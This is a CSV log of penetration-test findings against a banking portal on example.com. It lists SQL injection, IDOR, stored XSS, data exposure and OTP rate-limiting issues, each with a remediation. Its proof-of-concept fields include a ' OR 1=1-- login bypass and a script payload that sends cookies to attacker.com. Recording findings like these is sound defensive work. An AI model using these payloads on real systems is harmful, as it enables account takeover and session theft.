engagement_id,app_id,app_name,engagement_date,assessor_name,finding_title,vulnerability_class,owasp_category,cwe_id,cve_id,CVSS,Severity,affected_url,parameter,poc,remediation,Status
ENG-EXT-2025-01,APP-001,Internet Banking Portal,2025-01-15,EY Red Team,Authentication Bypass via SQL Injection,Injection,A03:2021-Injection,CWE-89,,9.8,Critical,https://ibank.example.com/api/v2/login,username,"POST /api/v2/login HTTP/1.1
username=' OR 1=1-- &password=test
Response: 200 OK {token: 'xxx'}","Implement parameterized queries, input validation, and WAF rules for SQL injection.",open
ENG-EXT-2025-01,APP-001,Internet Banking Portal,2025-01-15,EY Red Team,IDOR - Access Other Users Account Details,Broken Access Control,A01:2021-Broken Access Control,CWE-639,,8.1,High,https://ibank.example.com/api/v2/accounts/,accountId,"GET /api/v2/accounts/10001 returns data for authenticated user, GET /api/v2/accounts/10002 also returns data (different user)",Implement object-level authorization checks server-side.,open
ENG-EXT-2025-01,APP-001,Internet Banking Portal,2025-01-15,EY Red Team,Stored XSS in Transaction Notes,XSS,A03:2021-Injection,CWE-79,,6.1,Medium,https://ibank.example.com/transactions,note,Stored payload <script>document.location='https://attacker.com?c='+document.cookie</script> in transaction note executes when viewed by victim.,"Implement output encoding, Content Security Policy headers.",open
ENG-EXT-2025-01,APP-001,Internet Banking Portal,2025-01-15,EY Red Team,Sensitive Data in API Response,Sensitive Data Exposure,A02:2021-Cryptographic Failures,CWE-200,,5.3,Medium,https://ibank.example.com/api/v2/profile,,"GET /api/v2/profile returns full account number, CVV equivalent data in plaintext JSON response.",Mask sensitive data in API responses. Return only necessary fields.,open
ENG-EXT-2025-01,APP-001,Internet Banking Portal,2025-01-15,EY Red Team,Missing Rate Limiting on OTP Endpoint,Security Misconfiguration,A05:2021-Security Misconfiguration,CWE-307,,7.5,High,https://ibank.example.com/api/v2/otp/verify,otp,OTP endpoint allows unlimited guesses. 6-digit OTP bruteforceable in minutes.,"Implement rate limiting, account lockout after N failed OTP attempts.",open
